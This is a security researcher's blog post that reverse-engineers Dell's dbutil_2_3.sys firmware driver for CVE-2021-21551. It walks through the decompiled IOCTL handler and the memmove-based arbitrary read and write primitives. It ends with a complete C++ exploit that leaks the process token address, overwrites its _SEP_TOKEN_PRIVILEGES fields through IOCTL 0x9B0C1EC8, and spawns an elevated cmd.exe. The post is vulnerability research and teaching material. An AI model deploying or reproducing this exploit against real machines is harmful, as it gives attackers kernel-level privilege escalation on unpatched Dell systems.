Reverse Engineering & Exploiting Dell CVE-2021-21551
At the beginning of the month, Sentinel One disclosed five high severity vulnerabilities in Dell’s firmware update driver.
As the described vulnerability appeared not too complicated to exploit, a lot of fellow security researchers started weaponizing it. I was one of, if not the first tweeting about weaponizing it into a _SEP_TOKEN_PRIVILEGES
overwrite exploit, and with this blog post I would like to write down my thoughts process when dealing with n-day exploit writing. It’s a didactic blog post but keep in mind that, as I’ve already blogged before about the following topics, I would give them per granted and as a pre-requisite, feel free to skip them if you are already familiar with the topics.
Pre-Requisites
- Windows Kernel Exploitation: Setting up the lab
Setting up kernel debugging on different Windows flavours.
As the blog post does not explicitly mention Windows 10, follow along the “More Windows Debuggee Flavours” paragraph. - Windows Kernel Exploitation: Exploiting System Mechanic Driver
If you are not familiar with concepts like DriverEntry, Dispatch Routines, theIRP_MJ_DEVICE_CONTROL structure
, IOCTL codes,_SEP_TOKEN_PRIVILEGES
andEPROCESS
structures as well as their exploitation I highly recommend reading this lengthy blog post.
Reverse Engineering
First of all, we need to recover a copy of the dbutil_2_3.sys
driver mentioned by Sentinel One in their blog post. If you do not happen to have a Dell PC (which I was “lucky” enough to have), the best thing you can try to do is searching for the original installer/driver on Dell’s website or, if you have a VirusTotal subscription, you can try to search and see if anyone had uploaded the file.
I’ve also uploaded the dbutil_2_3.sys
driver file, IDA’s DB and, of course, exploit code, on my GitHub repo.
dbutil_2_3.sys SHA1 C948AE14761095E4D76B55D9DE86412258BE7AFD
As always, we’ll start by loading the driver into our preferred disassembler, IDA in my case, and add the following needed structures if missing:
DRIVER_OBJECT
IRP
IO_STACK_LOCATION
DriverEntry
IDA recognize some basic functions, as DriverEntry
, from which we’ll start our analysis.
DriverEntry
function is pretty small and we can easily skip all of it up to the point where sub_11008
is called.
sub_11008
This function is very important as it set up the DRIVER_OBJECT
data structure that holds information about the driver itself. Specifically, we are interested in the device name and symbolic link:
\\Device\\DBUtil_2_3
\\DosDevices\\DBUtil_2_3
There is a specific index inside MajorFunctions
defined as IRP_MJ_DEVICE_CONTROL
. At this index, the function pointer of the dispatch routine, which is invoked after the DeviceIoControl
API call on the driver’s device, is stored. This function is very important because one of its arguments is a 32-bit integer known as I/O Control (IOCTL). This I/O code is passed to the driver and makes it do different actions based on the different IOCTLs that are passed to it through DeviceIoControl
. Essentially, the dispatch routine at index IRP_MJ_DEVICE_CONTROL
will, at some point in its code, act as a switch case.
In this case that happens in sub_11170
.
sub_11170
This function is pretty big but if we use the graph overview, we can see it acts as a switch case, selecting different values:
Here the “magic” happens and different IOCTL codes trigger different function calls.
As Sentinel One was very clear about the IOCTL code we should search for (0x9B0C1EC8
), we can directly start disassembling this function and see where that specific IOCTL code is referenced.
Here below you can find the disassembled code with comments:
__int64 __fastcall Driver_IRP_MJ_DEVICE_CONTROL(DEVICE_OBJECT *a1, IRP *a2) { _IO_STACK_LOCATION *v2; // r8 _QWORD **Src; // rdi NTSTATUS v4; // ebx ULONG v6; // ecx unsigned int IOCT_Code; // eax __int64 v8; // rdx _QWORD *v9; // r11 __int64 *v10; // rdx _QWORD *v11; // r11 _QWORD *v12; // r11 _QWORD *v13; // rax _QWORD *v14; // rcx char v15; // dl NTSTATUS v16; // eax char v17; // dl _QWORD *v18; // r8 _QWORD *v19; // rdx _QWORD *v20; // rax _QWORD *v21; // rcx _DWORD *v22; // rcx _QWORD *v24; // [rsp+20h] [rbp-78h] int BaseAddress; // [rsp+28h] [rbp-70h] SIZE_T NumberOfBytes; // [rsp+30h] [rbp-68h] __int64 Dst[8]; // [rsp+40h] [rbp-58h] BYREF char v28; // [rsp+80h] [rbp-18h] v2 = a2->Tail.Overlay.CurrentStackLocation; Src = (_QWORD **)a1->DeviceExtension; v4 = 0; *((_DWORD *)Src + 2) = 0; if ( v2->MajorFunction != 14 ) goto LABEL_61; *Src = &a2->AssociatedIrp.MasterIrp->Type; v6 = v2->Parameters.Create.Options; *((_DWORD *)Src + 2) = v6; if ( v6 == v2->Parameters.Read.Length ) { IOCT_Code = v2->Parameters.Read.ByteOffset.LowPart; v8 = 0x9B0C1F40i64; if ( IOCT_Code <= 0x9B0C1F40 ) { if ( IOCT_Code != 0x9B0C1F40 ) { if ( IOCT_Code == 0x9B0C1EC0 ) { v16 = sub_51D4((__int64)Src); } else { if ( IOCT_Code == 0x9B0C1EC4 ) { v15 = 1; } else { if ( IOCT_Code != 0x9B0C1EC8 ) // VULN FUNC HERE { switch ( IOCT_Code ) { case 0x9B0C1ECC: if ( v6 != 24 ) goto invalid_parameter; v24 = (_QWORD *)**Src; NumberOfBytes = (*Src)[2]; v13 = Src[2]; if ( !v13 || v13 == v24 ) { MmFreeContiguousMemorySpecifyCache((PVOID)(*Src)[1], (unsigned int)NumberOfBytes, MmNonCached); LODWORD(NumberOfBytes) = 0; v14 = *Src; *v14 = v24; v14[1] = 0i64; v14[2] = NumberOfBytes; goto LABEL_61; } break; case 0x9B0C1F00: if ( v6 != 72 ) goto invalid_parameter; memmove(Dst, *Src, 0x48ui64); v12 = Src[2]; if ( !v12 || v12 == (_QWORD *)Dst[0] ) { memmove(Src + 11, Dst, 0x48ui64); DeferredRoutine(0i64, Src, 0i64, 0i64); memmove(Dst, Src + 11, 0x48ui64); goto LABEL_23; } break; case 0x9B0C1F04: if ( v6 != 72 ) goto invalid_parameter; memmove(Dst, *Src, 0x48ui64); v11 = Src[2]; if ( !v11 || v11 == (_QWORD *)Dst[0] ) { v28 = 0; memmove(Src + 11, Dst, 0x48ui64); KeInsertQueueDpc((PRKDPC)(Src + 3), Src, Src); LABEL_23: v10 = Dst; LABEL_18: memmove(*Src, v10, 0x48ui64); goto LABEL_61; } break; default: if ( IOCT_Code != 0x9B0C1F08 || v6 != 0x48 ) goto invalid_parameter; memmove(Dst, *Src, 0x48ui64); v9 = Src[2]; if ( v9 && v9 != (_QWORD *)Dst[0] ) break; v10 = (__int64 *)(Src + 11); goto LABEL_18; } access_violation: v4 = 0xC0000005; // STATUS_ACCESS_VIOLATION goto exit; } v15 = 0; } v16 = crash(Src, v15); // VULN FUNC HERE // Src = *ptr user_buffer // v8=0 } goto LABEL_60; } v17 = 1; goto LABEL_59; } if ( IOCT_Code == 0x9B0C1F44 ) { v17 = 0; LABEL_59: v16 = sub_5100((__int64)Src, v17); LABEL_60: v4 = v16; if ( v16 ) goto exit; goto LABEL_61; } if ( IOCT_Code == 0x9B0C1F80 ) { LOBYTE(v2) = 1; } else { if ( IOCT_Code != 0x9B0C1F84 ) { if ( IOCT_Code == 0x9B0C1F88 ) { LOBYTE(v2) = 1; LOBYTE(v8) = 1; } else { if ( IOCT_Code != 0x9B0C1F8C ) { if ( IOCT_Code == 0x9B0C1FC0 ) { if ( v6 != 12 ) goto invalid_parameter; v22 = *Src; BaseAddress = *((_DWORD *)*Src + 2); LOBYTE(BaseAddress) = Src[2] != 0i64; *(_QWORD *)v22 = 0x300000002i64; v22[2] = BaseAddress; } else { if ( IOCT_Code != 0x9B0C1FC4 || v6 != 8 ) goto invalid_parameter; v18 = *Src; v19 = Src[2]; v20 = (_QWORD *)**Src; if ( v19 && v19 != v20 ) goto access_violation; v21 = 0i64; if ( !v19 ) v21 = (_QWORD *)**Src; Src[2] = v21; *v18 = v20; } LABEL_61: a2->IoStatus.Information = *((unsigned int *)Src + 2); goto exit; } v2 = 0i64; LOBYTE(v8) = 1; } goto LABEL_53; } v2 = 0i64; } v8 = 0i64; LABEL_53: v16 = sub_5008(Src, v8, v2); goto LABEL_60; } invalid_parameter: v4 = 0xC000000D; // STATUS_INVALID_PARAMETER exit: a2->IoStatus.Status = v4; IofCompleteRequest(a2, 0); return (unsigned int)v4; }
We can see that once our IOCTL code has been found, a jump happens, thus bringing us to sub_15294
.
cmp eax, 9B0C1EC8h .text:00000000000111F5 jz loc_113A0
Arbitrary Write
This function, sub_15294
(dbutil_2_3+0x5294
), once decompiled is pretty easy to understand:
__int64 __fastcall crash(__int64 **userBuffer, char a2) { _QWORD; // rbx _DWORD ecx1; // ecx __int64 result; // rax _QWORD r9_3; // r9 _QWORD rax3; // rax _DWORD Size; // eax _QWORD Dest; // rcx _QWORD Src; // rdx _QWORD rcx9; // rcx _QWORD field1; // [rsp+20h] [rbp-28h] _QWORD field2; // [rsp+28h] [rbp-20h] _QWORD field3; // [rsp+30h] [rbp-18h] ecx1 = *((_DWORD *)userBuffer + 2); if ( ecx1 < 24 ) return 0xC000000Di64; // STATUS_INVALID_PARAMETER r9_3 = *userBuffer; field1 = **userBuffer; field2 = (*userBuffer)[1]; field3 = (*userBuffer)[2]; rax3 = userBuffer[2]; if ( rax3 && rax3 != (__int64 *)field1 ) return 0xC0000005i64; // STATUS_ACCESS_VIOLATION Size = ecx1 - 24; Dest = (void *)(field2 + (unsigned int)field3); if ( a2 ) { Src = (const void *)(field2 + (unsigned int)field3); Dest = r9_3 + 3; } else { Src = r9_3 + 3; } memmove(Dest, Src, Size); rcx9 = *userBuffer; *rcx9 = field1; rcx9[1] = field2; rcx9[2] = field3; return 0i64; }
We expect the vulnerability to lay in the memmove
at dbutil_2_3+0x5301
. The memmove
is defined as follows:
void * memmove ( void * destination, const void * source, size_t num );
memmove copies num bytes from the location pointed by source to the memory block pointed by destination. Copying takes place in an intermediate buffer allowing the destination and source to overlap. - cplusplus.com
memmove
is a perfect candidate for our write what where exploit as it gives us a vanilla arbitrary write primitive, we should just check what parameters we can control and if there are any constraints.
Constraint 1
Looking at the very beginning of our decompiled function, we can clearly see how the ECX register value is compared with the value 24d or 0x18h
. Using a debugger, we can check what’s in the ECX register, turns out that it will contain the size of the user buffer. If the user’s buffer size is less than 24, as visible in the branch, we’ll hit the return 0xC000000D
or NTSTATUS STATUS_INVALID_PARAMETER
.
Constraint 2
Using IOCTLpus I’ll usually split the user’s buffer fields in half, in that way, if the x64 architecture uses half of the field is easier to determine where and what field is used.
User Buffer: --------------------------------- Second half | First Half (little-endian) field1: 41 41 41 41 | 42 42 42 42 field2: 43 43 43 43 | 44 44 44 44 field3: 45 45 45 45 | 46 46 46 46 field4: 47 47 47 47 | 48 48 48 48
Putting a breakpoint on the memmove
at dbutil_2_3+0x5301
and analysing the parameters being passed, I’ve discovered an interesting thing.
First of all, we should remember that as we are under x86_64
the fastcall calling convention is used; memmove
parameters will be passed in RCX, RDX, R8 registers
:
- RCX: destination
- RDX: source
- R8: size
Once we hit the breakpoint, we can see the following values populating the registers:
- RCX:
0x4444444488888888
- RDX:
0x4848484847474747
- R8:
0x20h
Our destination address was mangled as the lower 32-bits (the second half of our third user’s buffer field) gets added to the destination buffer.
That’s can be seen from the raw assembly in the routine:
PAGE:00000000000152E4 mov ecx, dword ptr [rsp+48h+var_18] PAGE:00000000000152E8 add rcx, [rsp+48h+var_20] ; Dst
Fortunately setting the entire 3rd field with all 0x0
we can “bypass” this address mangling.
Recap
Setting up at least a four fields user buffer. Less won’t be enough to populate the memmove
and will not pass the check on the user’s buffer length:
- This field can be set to whatever value we want.
- This field must be set to the address of the
memmove
’s destination. - This field must be set at 0x0, otherwise, its lower half will be added to the
memmove
’s destination mangling the address. - This field must be set with the value of what we need to write on the
memmove
’s destination.
Arbitrary Read
A bit more of reverse engineering let us discover the following IOCTL code 0x9b0c1ec4 in sub_11170
.
Despite being a completely different IOCTL code, analysing the code we can see as it ends up in the same routine. The only difference is that this time, the v14
parameter has been set to 1.
if ( IOCT_Code == 0x9B0C1EC4 ) { v14 = 1; } [--SNIP--] v15 = sub_15294(Src, v14);
As this time the v14
parameter has been set and therefore exist, the execution flow changes in sub_15294
; specifically, this check changes some offsets later used by the memmove
.
if ( a2 ) { v9 = (const void *)(v12 + (unsigned int)v13); v8 = v5 + 3; } [--SNIP--] memmove(v8, v9, v7);
This time, in fact, the call to the memmove
has an interesting twist: the second user’s buffer field (v9
), instead of being used as a destination, is used as a source. The destination is the remaining of the user’s buffer (field 3 and 4).
Please Note: as we control every parameter of the memmove
, there is no real limit to the amount of data we can transfer. The fact that we were reading/writing only a “pointer” (ULONG_PTR
size) at time was to keep our primitive simple.
Video PoC
_SEP_TOKEN_PRIVILEGES Overwrite Exploit Code
/* Exploit title: DELL dbutil_2_3.sys v. <= 2.3 - Arbitrary Write to Local Privilege Escalation (LPE) Exploit Authors: Paolo Stagno aka VoidSec - voidsec@voidsec.com - https://voidsec.com CVE: CVE-2021-21551 Date: 10/05/2021 Version: v.2.3 Tested on: Windows 10 Pro x64 v.1903 Build 18362.30 Category: local exploit Platform: windows “I believe cats to be spirits come to earth. A cat, I am sure, could walk on a cloud without coming through.” - Jules Verne */ #include <iostream> #include <windows.h> #include <winternl.h> #include <tlhelp32.h> #include <algorithm> #define IOCTL_CODE 0x9B0C1EC8 // IOCTL_CODE value, used to reach the vulnerable function (taken from IDA) #define SystemHandleInformation 0x10 #define SystemHandleInformationSize 1024 * 1024 * 2 // define the buffer structure which will be sent to the vulnerable driver typedef struct Exploit { uint64_t Field1; // "padding" can be anything void* Field2; // where to write uint64_t Field3; // must be 0 uint64_t Field4; // value to write }; typedef struct outBuffer { uint64_t Field1; uint64_t Field2; uint64_t Field3; uint64_t Field4; }; // define a pointer to the native function 'NtQuerySystemInformation' using pNtQuerySystemInformation = NTSTATUS(WINAPI*)( ULONG SystemInformationClass, PVOID SystemInformation, ULONG SystemInformationLength, PULONG ReturnLength); // define the SYSTEM_HANDLE_TABLE_ENTRY_INFO structure typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO { USHORT UniqueProcessId; USHORT CreatorBackTraceIndex; UCHAR ObjectTypeIndex; UCHAR HandleAttributes; USHORT HandleValue; PVOID Object; ULONG GrantedAccess; } SYSTEM_HANDLE_TABLE_ENTRY_INFO, * PSYSTEM_HANDLE_TABLE_ENTRY_INFO; // define the SYSTEM_HANDLE_INFORMATION structure typedef struct _SYSTEM_HANDLE_INFORMATION { ULONG NumberOfHandles; SYSTEM_HANDLE_TABLE_ENTRY_INFO Handles[1]; } SYSTEM_HANDLE_INFORMATION, * PSYSTEM_HANDLE_INFORMATION; int main(int argc, char** argv) { // open a handle to the device exposed by the driver - symlink is \\.\\DBUtil_2_3 HANDLE device = ::CreateFileW( L"\\\\.\\DBUtil_2_3", GENERIC_WRITE | GENERIC_READ, NULL, nullptr, OPEN_EXISTING, NULL, NULL); if (device == INVALID_HANDLE_VALUE) { std::cout << "[!] Couldn't open handle to DBUtil_2_3 driver. Error code: " << ::GetLastError() << std::endl; return -1; } std::cout << "[+] Opened a handle to DBUtil_2_3 driver!\n"; // resolve the address of NtQuerySystemInformation and assign it to a function pointer pNtQuerySystemInformation NtQuerySystemInformation = (pNtQuerySystemInformation)::GetProcAddress(::LoadLibraryW(L"ntdll"), "NtQuerySystemInformation"); if (!NtQuerySystemInformation) { std::cout << "[!] Couldn't resolve NtQuerySystemInformation API. Error code: " << ::GetLastError() << std::endl; return -1; } std::cout << "[+] Resolved NtQuerySystemInformation!\n"; // open the current process token - it will be used to retrieve its kernelspace address later HANDLE currentProcess = ::GetCurrentProcess(); HANDLE currentToken = NULL; bool success = ::OpenProcessToken(currentProcess, TOKEN_ALL_ACCESS, ¤tToken); if (!success) { std::cout << "[!] Couldn't open handle to the current process token. Error code: " << ::GetLastError() << std::endl; return -1; } std::cout << "[+] Opened a handle to the current process token!\n"; // allocate space in the heap for the handle table information which will be filled by the call to 'NtQuerySystemInformation' API PSYSTEM_HANDLE_INFORMATION handleTableInformation = (PSYSTEM_HANDLE_INFORMATION)HeapAlloc(::GetProcessHeap(), HEAP_ZERO_MEMORY, SystemHandleInformationSize); // call NtQuerySystemInformation and fill the handleTableInformation structure ULONG returnLength = 0; NtQuerySystemInformation(SystemHandleInformation, handleTableInformation, SystemHandleInformationSize, &returnLength); uint64_t tokenAddress = 0; // iterate over the system's handle table and look for the handles beloging to our process for (int i = 0; i < handleTableInformation->NumberOfHandles; i++) { SYSTEM_HANDLE_TABLE_ENTRY_INFO handleInfo = (SYSTEM_HANDLE_TABLE_ENTRY_INFO)handleTableInformation->Handles[i]; // if it finds our process and the handle matches the current token handle we already opened, print it if (handleInfo.UniqueProcessId == ::GetCurrentProcessId() && handleInfo.HandleValue == (USHORT)currentToken) { tokenAddress = (uint64_t)handleInfo.Object; std::cout << "[+] Current token address in kernelspace is at: 0x" << std::hex << tokenAddress << std::endl; } } outBuffer buffer = { 0, 0, 0, 0 }; /* dt nt!_SEP_TOKEN_PRIVILEGES +0x000 Present : Uint8B +0x008 Enabled : Uint8B +0x010 EnabledByDefault : Uint8B We've added +1 to the offsets to ensure that the low bytes part are 0xff. */ // overwrite the _SEP_TOKEN_PRIVILEGES "Present" field in the current process token Exploit exploit = { 0x4141414142424242, (void*)(tokenAddress + 0x40), 0x0000000000000000, 0xffffffffffffffff }; // overwrite the _SEP_TOKEN_PRIVILEGES "Enabled" field in the current process token Exploit exploit2 = { 0x4141414142424242, (void*)(tokenAddress + 0x48), 0x0000000000000000, 0xffffffffffffffff }; // overwrite the _SEP_TOKEN_PRIVILEGES "EnabledByDefault" field in the current process token Exploit exploit3 = { 0x4141414142424242, (void*)(tokenAddress + 0x50), 0x0000000000000000, 0xffffffffffffffff }; DWORD bytesReturned = 0; success = DeviceIoControl( device, IOCTL_CODE, &exploit, sizeof(exploit), &buffer, sizeof(buffer), &bytesReturned, nullptr); if (!success) { std::cout << "[!] Couldn't overwrite current token 'Present' field. Error code: " << ::GetLastError() << std::endl; return -1; } std::cout << "[+] Successfully overwritten current token 'Present' field!\n"; success = DeviceIoControl( device, IOCTL_CODE, &exploit2, sizeof(exploit2), &buffer, sizeof(buffer), &bytesReturned, nullptr); if (!success) { std::cout << "[!] Couldn't overwrite current token 'Enabled' field. Error code: " << ::GetLastError() << std::endl; return -1; } std::cout << "[+] Successfully overwritten current token 'Enabled' field!\n"; success = DeviceIoControl( device, IOCTL_CODE, &exploit3, sizeof(exploit3), &buffer, sizeof(buffer), &bytesReturned, nullptr); if (!success) { std::cout << "[!] Couldn't overwrite current token 'EnabledByDefault' field. Error code:" << ::GetLastError() << std::endl; return -1; } std::cout << "[+] Successfully overwritten current token 'EnabledByDefault' field!\n"; std::cout << "[+] Token privileges successfully overwritten!\n"; std::cout << "[+] Spawning a new shell with full privileges!\n"; system("cmd.exe"); return 0; }